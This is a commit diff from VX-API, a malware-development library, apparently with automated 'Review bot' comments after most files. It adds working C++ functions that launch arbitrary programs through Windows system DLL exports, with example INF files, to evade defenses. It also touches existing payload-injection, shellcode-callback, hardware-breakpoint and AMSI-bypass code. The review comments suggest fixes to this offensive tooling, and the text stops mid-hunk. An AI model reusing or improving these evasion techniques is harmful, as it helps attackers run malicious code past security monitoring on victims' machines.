parent
08fc458393
commit
0ee9d00a95
11
README.md
11
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.658
|
||||
Version: 2.0.684
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -103,6 +103,13 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| CopyFileViaSetupCopyFile | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSectionInstallStringNoCab | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSetupCommand | smelly__vx | Evasion |
|
||||
| CreateProcessFromINFSectionInstallStringNoCab2 | smelly__vx | Evasion |
|
||||
| CreateProcessFromIeFrameOpenUrl | smelly__vx | Evasion |
|
||||
| CreateProcessFromPcwUtil | smelly__vx | Evasion |
|
||||
| CreateProcessFromShdocVwOpenUrl | smelly__vx | Evasion |
|
||||
| CreateProcessFromShell32ShellExecRunDll | smelly__vx | Evasion |
|
||||
|
||||
| CreateProcessFromPcwUtil | smelly__vx | Evasion |
|
||||
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
|
||||
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
|
||||
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
|
||||
|
@ -150,6 +157,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| WriteDataToPeSection | smelly__vx | Helper Functions |
|
||||
| GetPeSectionSizeInByte | smelly__vx | Helper Functions |
|
||||
| ReadDataFromPeSection | smelly__vx | Helper Functions |
|
||||
| GetCurrentProcessNoForward | ReactOS | Helper Functions |
|
||||
| GetCurrentThreadNoForward | ReactOS | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
|
|
|
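--- /dev/null
+++ b/CreateProcessFromINFSectionInstallStringNoCab2.cpp
@@ -0,0 +1,115 @@
+#include "Win32Helper.h"
+
+/*
+
+Example .inf file
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+[version]
+signature = $Chicago$
+AdvancedInf = 2.5
+
+[DefaultInstall_SingleUser]
+RunPostSetupCommands = Tag1
+
+[Tag1]
+C:\Windows\system32\calc.exe
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+*/
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
+{
+typedef HRESULT(WINAPI* LAUNCHINFSECTIONW)(HWND, HINSTANCE, PWSTR, INT);
+LAUNCHINFSECTIONW LaunchINFSectionW = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+WCHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
+
+hMod = LoadLibraryW(L"ieadvpack.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+LaunchINFSectionW = (LAUNCHINFSECTIONW)GetProcAddressA((DWORD64)hMod, "LaunchINFSectionW");
+if (!LaunchINFSectionW)
+goto EXIT_ROUTINE;
+
+if (StringCopyW(InfExecutionBuffer, PathToInfFile) == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatW(InfExecutionBuffer, L",") == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatW(InfExecutionBuffer, NameOfSection) == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatW(InfExecutionBuffer, L",") == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatW(InfExecutionBuffer, L"1") == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatW(InfExecutionBuffer, L",") == NULL)
+goto EXIT_ROUTINE;
+
+if (!SUCCEEDED(LaunchINFSectionW(NULL, NULL, InfExecutionBuffer, 0)))
+goto EXIT_ROUTINE;
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
+{
+typedef HRESULT(WINAPI* LAUNCHINFSECTION)(HWND, HINSTANCE, PSTR, INT);
+LAUNCHINFSECTION LaunchINFSection = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+CHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
+
+hMod = LoadLibraryW(L"ieadvpack.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+LaunchINFSection = (LAUNCHINFSECTION)GetProcAddressA((DWORD64)hMod, "LaunchINFSection");
+if (!LaunchINFSection)
+goto EXIT_ROUTINE;
+
+if (StringCopyA(InfExecutionBuffer, PathToInfFile) == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatA(InfExecutionBuffer, NameOfSection) == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatA(InfExecutionBuffer, "1") == NULL)
+goto EXIT_ROUTINE;
+
+if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+goto EXIT_ROUTINE;
+
+if (!SUCCEEDED(LaunchINFSection(NULL, NULL, InfExecutionBuffer, 0)))
+goto EXIT_ROUTINE;
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}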
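Review bot: InfExecutionBuffer is a fixed MAX_PATH * 2 stack array, yet StringCopyW/StringConcatW are fed the caller-supplied PathToInfFile and NameOfSection with no length check, so an over-long path or section name overruns the stack; the A variant with StringCopyA/StringConcatA has the same shape. Before the first copy, reject inputs that cannot fit, e.g. `if (StringLengthW(PathToInfFile) + StringLengthW(NameOfSection) + 4 >= (MAX_PATH * 2)) goto EXIT_ROUTINE;` (the +4 covers the two commas, the "1" flag and the terminator) and the StringLengthA equivalent in the A variant; this assumes the String* helpers are unbounded strcpy/strcat-style calls, which their call shape suggests but this page does not show. The trailing "," appended after the "1" leaves an empty final field in the string handed to LaunchINFSectionW, and nothing says why it is there — a one-line comment on the format of that string ("inf,section,flags,") would keep the next maintainer from "fixing" it.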
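--- /dev/null
+++ b/CreateProcessFromINFSectionInstallStringNoCab3.cpp
@@ -0,0 +1,53 @@
+#include "Win32Helper.h"
+
+/*
+
+Example .inf file
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+; ----------------------------------------------------------------------
+; Required Sections
+; ----------------------------------------------------------------------
+[Version]
+Signature=$CHICAGO$
+Provider=test
+Class=Printer
+
+[Manufacturer]
+HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
+
+; ----------------------------------------------------------------------
+; Models Section
+; ----------------------------------------------------------------------
+[ModelsSection.NTx86]
+UnregisterDlls = Squiblydoo
+
+[ModelsSection.NTia64]
+UnregisterDlls = Squiblydoo
+
+[ModelsSection.NTamd64]
+UnregisterDlls = Squiblydoo
+
+; ----------------------------------------------------------------------
+; Support Sections
+; ----------------------------------------------------------------------
+[DefaultInstall]
+UnregisterDlls = Squiblydoo
+
+[Squiblydoo]
+calc.exe
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+*/
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
+{
+return FALSE;
+}
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
+{
+return FALSE;
+}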
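Review bot: Both stubs return FALSE without setting an error code, so a caller cannot distinguish "not implemented" from "the INF section failed to run"; the only hint is the `// <--- not implemented` remark in the header. Make the placeholder explicit in each variant: `UNREFERENCED_PARAMETER(PathToInfFile); UNREFERENCED_PARAMETER(NameOfSection); SetLastError(ERROR_CALL_NOT_IMPLEMENTED);` ahead of `return FALSE;`, which also silences unused-parameter warnings. A short comment above the W stub stating that the example INF describes the intended UnregisterDlls-based variant and that the implementation is pending would keep the file honest until it lands.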
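--- /dev/null
+++ b/CreateProcessFromIeFrameOpenUrl.cpp
@@ -0,0 +1,59 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile)
+{
+typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+OPENURL OpenUrl = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
+
+if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
+goto EXIT_ROUTINE;
+
+hMod = LoadLibraryW(L"ieframe.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
+if (!OpenUrl)
+goto EXIT_ROUTINE;
+
+OpenUrl(NULL, NULL, ccPathToUrlFile);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}
+
+BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile)
+{
+typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+OPENURL OpenUrl = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+
+hMod = LoadLibraryW(L"ieframe.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
+if (!OpenUrl)
+goto EXIT_ROUTINE;
+
+OpenUrl(NULL, NULL, PathToUrlFile);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}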
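Review bot: The A variant resolves `"OpenUrl"` while the W variant resolves `"OpenURL"`; export-name lookup is case-sensitive, so unless ieframe.dll exports both spellings one of the two variants will always get NULL and return FALSE — pick the exported spelling and use it in both (the shdocvw pair in this commit has the same mismatch). Separately, the W variant converts into `CHAR ccPathToUrlFile[MAX_PATH]` using StringLengthW(PathToUrlFile) as the count with no check that the length is below MAX_PATH, so an over-long path overruns the stack if WCharStringToCharString is an unbounded converter, as its use here suggests; add `if (StringLengthW(PathToUrlFile) >= MAX_PATH) goto EXIT_ROUTINE;` before the conversion. Because OpenURL is typed VOID, `bFlag = TRUE` only records that the export was called, not that anything was launched — say so in a comment above the assignment.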
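--- /dev/null
+++ b/CreateProcessFromPcwUtil.cpp
@@ -0,0 +1,59 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromPcwUtilW(LPCWSTR PathToBinary)
+{
+typedef VOID(WINAPI* LAUNCHAPPLICATIONW)(HWND, HINSTANCE, LPCWSTR);
+LAUNCHAPPLICATIONW LaunchApplicationW = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+
+hMod = LoadLibraryW(L"pcwutl.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+LaunchApplicationW = (LAUNCHAPPLICATIONW)GetProcAddressA((DWORD64)hMod, "LaunchApplicationW");
+if (!LaunchApplicationW)
+goto EXIT_ROUTINE;
+
+LaunchApplicationW(NULL, NULL, PathToBinary);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}
+
+BOOL CreateProcessFromPcwUtilA(LPCSTR PathToBinary)
+{
+typedef VOID(WINAPI* LAUNCHAPPLICATIONW)(HWND, HINSTANCE, LPCWSTR);
+LAUNCHAPPLICATIONW LaunchApplicationW = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+WCHAR wBinaryPath[MAX_PATH * sizeof(WCHAR)] = { 0 };
+
+if (CharStringToWCharString(wBinaryPath, (PCHAR)PathToBinary, StringLengthA(PathToBinary)) == NULL)
+goto EXIT_ROUTINE;
+
+hMod = LoadLibraryW(L"pcwutl.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+LaunchApplicationW = (LAUNCHAPPLICATIONW)GetProcAddressA((DWORD64)hMod, "LaunchApplicationW");
+if (!LaunchApplicationW)
+goto EXIT_ROUTINE;
+
+LaunchApplicationW(NULL, NULL, wBinaryPath);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}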
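Review bot: `WCHAR wBinaryPath[MAX_PATH * sizeof(WCHAR)]` declares 520 WCHARs — the sizeof multiplies the element count, which reads like a bytes-versus-characters mix-up — and nothing checks StringLengthA(PathToBinary) against the buffer before CharStringToWCharString fills it, so an over-long path overruns the stack if the converter is unbounded, as its call shape suggests. Declare `WCHAR wBinaryPath[MAX_PATH] = { 0 };` and guard with `if (StringLengthA(PathToBinary) >= MAX_PATH) goto EXIT_ROUTINE;` ahead of the conversion. The conversion result is compared with NULL here but with 0 in the ieframe and shdocvw files added by the same commit; the helpers' return types should settle which form is right, and the call sites should agree. LaunchApplicationW is typed VOID, so `bFlag = TRUE` means the export was reached, not that the binary started — worth a comment above the assignment.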
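--- /dev/null
+++ b/CreateProcessFromShdocVwOpenUrl.cpp
@@ -0,0 +1,58 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile)
+{
+typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+OPENURL OpenUrl = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
+
+if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
+goto EXIT_ROUTINE;
+
+hMod = LoadLibraryW(L"shdocvw.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
+if (!OpenUrl)
+goto EXIT_ROUTINE;
+
+OpenUrl(NULL, NULL, ccPathToUrlFile);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}
+BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
+{
+typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+OPENURL OpenUrl = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+
+hMod = LoadLibraryW(L"shdocvw.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
+if (!OpenUrl)
+goto EXIT_ROUTINE;
+
+OpenUrl(NULL, NULL, PathToUrlFile);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hMod)
+FreeLibrary(hMod);
+
+return bFlag;
+}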
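Review bot: `"OpenURL"` in the W variant versus `"OpenUrl"` in the A variant — export lookup is case-sensitive, so one of the two will get NULL from GetProcAddressA and always return FALSE; use the spelling shdocvw.dll actually exports in both. The W variant converts into `CHAR ccPathToUrlFile[MAX_PATH]` with StringLengthW(PathToUrlFile) as the length and no upper bound, so an input of MAX_PATH or more characters overruns the buffer if the converter is unbounded — add `if (StringLengthW(PathToUrlFile) >= MAX_PATH) goto EXIT_ROUTINE;` before it. This file is the ieframe one with the DLL name swapped; a single static helper taking the module name would remove the duplicated body and the duplicated bug. The missing blank line between the closing brace of the W function and the A signature breaks the layout used everywhere else in the commit.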
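--- /dev/null
+++ b/CreateProcessFromShell32ShellExecRunDll.cpp
@@ -0,0 +1,50 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
+{
+typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
+SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+
+hMod = TryLoadDllMultiMethodW((PWCHAR)L"shell32.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+ShellExec_RunDllW = (SHELLEXEC_RUNDLLW)GetProcAddressA((DWORD64)hMod, "ShellExec_RunDLLW");
+if (!ShellExec_RunDllW)
+goto EXIT_ROUTINE;
+
+ShellExec_RunDllW(NULL, NULL, PathToFile, SW_SHOW);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+
+return bFlag;
+}
+
+BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
+{
+typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
+SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;
+HMODULE hMod = NULL;
+BOOL bFlag = FALSE;
+
+hMod = TryLoadDllMultiMethodW((PWCHAR)L"shell32.dll");
+if (hMod == NULL)
+goto EXIT_ROUTINE;
+
+ShellExec_RunDllA = (SHELLEXEC_RUNDLLA)GetProcAddressA((DWORD64)hMod, "ShellExec_RunDLLA");
+if (!ShellExec_RunDllA)
+goto EXIT_ROUTINE;
+
+ShellExec_RunDllA(NULL, NULL, PathToFile, SW_SHOW);
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+return bFlag;
+}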
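Review bot: Neither variant releases the module obtained from TryLoadDllMultiMethodW — unlike every other new file in this commit there is no FreeLibrary at EXIT_ROUTINE, and the label is followed only by blank lines. If that helper can hand back a freshly loaded module, each call leaks a reference; if it can also return a GetModuleHandle-style handle the process already owns, freeing blindly would be wrong, so the ownership contract needs stating right there, e.g. `// hMod from TryLoadDllMultiMethodW is deliberately not freed: confirm whether the helper transfers ownership`. ShellExec_RunDLLW is typed VOID, so `bFlag = TRUE` records only that the export was invoked, not that PathToFile was launched; the function header comment should say so. The `(PWCHAR)` cast that strips const from the literal is a sign the helper's parameter should be LPCWSTR.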
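--- /dev/null
+++ b/GetCurrentProcessNoForward.cpp
@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetCurrentProcessNoForward(VOID)
+{
+return (HANDLE)((HANDLE)-1);
+}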
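Review bot: `(HANDLE)((HANDLE)-1)` casts the int -1 straight to a pointer and then casts the pointer to its own type, whereas the sibling GetCurrentThreadNoForward added in the same commit goes through LONG_PTR; the outer cast is dead and the int-to-pointer conversion of a narrower type is what 64-bit builds warn about. Write `return (HANDLE)(LONG_PTR)-1;` to match the thread variant. A one-line header comment is also missing — presumably the point is to return the current-process pseudo-handle without emitting a call to the forwarded kernel32 export, which the name suggests but the page does not confirm — and readers should not have to reverse-engineer the magic value.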
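--- /dev/null
+++ b/GetCurrentThreadNoForward.cpp
@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetCurrentThreadNoForward(VOID)
+{
+return ((HANDLE)(LONG_PTR)-2);
+}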
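Review bot: Nothing explains the hard-coded -2, which replaces the removed InlineGetCurrentThread macro and is presumably the current-thread pseudo-handle value that GetCurrentThread returns; that should be written down rather than assumed. Suggested header: `// Current-thread pseudo-handle (-2), returned inline so no call to the kernel32 GetCurrentThread export is emitted — presumably to avoid the import; confirm.` It is also worth stating that the value must never be passed to CloseHandle, since SetHardwareBreakpoint now routes its hHandle through this function.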
@ -19,7 +19,7 @@ LPWSTR GetCurrentUserSidW(VOID)
|
|||
LPWSTR pSid = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
|
@ -84,7 +84,7 @@ LPSTR GetCurrentUserSidA(VOID)
|
|||
LPSTR pSid = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
|
|
|
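Review bot: The new OpenProcessToken calls still request TOKEN_ALL_ACCESS in both the W and A variants although the only use visible here is GetTokenInformationBufferSize, and IsProcessRunningAsAdmin in this same commit opens its token with TOKEN_QUERY. Least privilege says `if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_QUERY, &hToken))` in both places, unless the rest of the function adjusts the token. Both function bodies continue past the hunk, so that cannot be checked from here.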
@ -13,7 +13,7 @@ BOOL IsIntelHardwareBreakpointPresent(VOID)
|
|||
|
||||
Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
|
||||
|
||||
if (!GetThreadContext(InlineGetCurrentThread, Context))
|
||||
if (!GetThreadContext(GetCurrentThreadNoForward(), Context))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (Context->Dr0 || Context->Dr1 || Context->Dr2 || Context->Dr3)
|
||||
|
|
|
@ -7,7 +7,7 @@ BOOL IsProcessRunningAsAdmin(VOID)
|
|||
DWORD dwSize = 0;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_QUERY, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_QUERY, &hToken))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize))
|
||||
|
|
|
@ -9,7 +9,7 @@ INT main(VOID)
|
|||
|
||||
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
|
||||
|
||||
CreateProcessFromINFSectionInstallStringNoCabA("C:\\Users\\dwThr\\Desktop\\demo.inf", "DefaultInstall_SingleUser");
|
||||
CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
|
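Review bot: The call `CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");` discards the BOOL result, so the harness cannot tell whether the technique worked; the page does not mark which of the two call lines is the new one, but given the functions this commit adds the shell32 call is presumably the addition. Check the result, e.g. `if (!CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe")) return GetLastError();`. The commented-out `//BOOL bFlag = AmsiBypassViaPatternScan(4288);` above it is dead code carrying a magic PID and should go, and the hard-coded `C:\\Users\\dwThr\\Desktop\\demo.inf` path on the other line embeds a developer account name that does not belong in a committed sample either way.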
|
@ -29,7 +29,7 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
|
|||
if (!RtlEncodeRemotePointer)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
if (!K32GetModuleInformation(GetCurrentProcessNoForward(), hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
|
|
|
@ -4,12 +4,12 @@ VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
|
|||
{
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
if (!SymInitialize(GetCurrentProcessNoForward(), NULL, TRUE))
|
||||
return;
|
||||
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
||||
EnumDirTreeW(GetCurrentProcessNoForward(), L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
SymCleanup(GetCurrentProcessNoForward());
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
VOID InvokeEnumerateLoadedModules64CallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
|
||||
EnumerateLoadedModules64(GetCurrentProcessNoForward(), (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, FALSE))
|
||||
if (!SymInitializeW(GetCurrentProcessNoForward(), NULL, FALSE))
|
||||
return;
|
||||
|
||||
#pragma warning( push )
|
||||
|
@ -10,7 +10,7 @@ VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
|
|||
SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK)lpParameter, NULL);
|
||||
#pragma warning( pop )
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
SymCleanup(GetCurrentProcessNoForward());
|
||||
|
||||
}
|
||||
|
||||
|
|
|
@ -2,12 +2,12 @@
|
|||
|
||||
VOID InvokeSymEnumSourceFilesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, TRUE))
|
||||
if (!SymInitializeW(GetCurrentProcessNoForward(), NULL, TRUE))
|
||||
return;
|
||||
|
||||
SymEnumSourceFilesW(GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
|
||||
SymEnumSourceFilesW(GetCurrentProcessNoForward(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
SymCleanup(GetCurrentProcessNoForward());
|
||||
}
|
||||
|
||||
BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
|
|
|
@ -16,7 +16,7 @@ VOID InvokeVerifierEnumerateResourceCallbackRoutine(LPVOID lpParameter)
|
|||
if (!VerifierEnumerateResource)
|
||||
return;
|
||||
|
||||
VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
|
||||
VerifierEnumerateResource(GetCurrentProcessNoForward(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
|
||||
|
||||
return;
|
||||
}
|
||||
|
|
|
@ -18,7 +18,7 @@ HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
|
|||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2W(lpModuleName);
|
||||
}
|
||||
|
@ -41,7 +41,7 @@ HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
|
|||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2A(lpModuleName);
|
||||
}
|
|
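Review bot: `NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout)` with `Timeout.QuadPart = -500000` is a relative 100-ns interval, i.e. a 50 ms wait on a handle that cannot become signaled while the process is alive — in effect a sleep — but neither variant says so, and a reader may take it for real synchronization with the queued work item. Add above each call: `// Relative 50 ms wait (100 ns units) on our own never-signaled process handle: a sleep to let the queued work item run`, with a TODO if the intent differs. Both function bodies begin outside the hunk, so whether the wait length is tied to the work item's timing cannot be checked here.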
@ -13,7 +13,7 @@ BOOL SetHardwareBreakpoint(_In_ DWORD ThreadId, _In_ PUINT_VAR_T Address, _In_ U
|
|||
goto EXIT_ROUTINE;
|
||||
}
|
||||
else
|
||||
hHandle = InlineGetCurrentThread;
|
||||
hHandle = GetCurrentThreadNoForward();
|
||||
|
||||
if (!GetThreadContext(hHandle, &Context))
|
||||
goto EXIT_ROUTINE;
|
||||
|
|
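Review bot: `hHandle = GetCurrentThreadNoForward();` stores a pseudo-handle in the else branch, while the if branch above it (outside the hunk, judging by the goto) presumably opens a real handle for ThreadId; if the function's cleanup closes hHandle on the way out, it must skip the pseudo-handle case, because CloseHandle on -2 fails. A comment on the else line such as `// pseudo-handle: must not be passed to CloseHandle` plus a flag recording whether hHandle was opened would make that explicit. The function begins before the hunk, so the opening and closing paths are not visible here.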
|
@ -2,7 +2,7 @@
|
|||
|
||||
BOOL SetProcessPrivilegeToken(_In_ DWORD PrivilegeEnum)
|
||||
{
|
||||
HANDLE Process = InlineGetCurrentProcess;
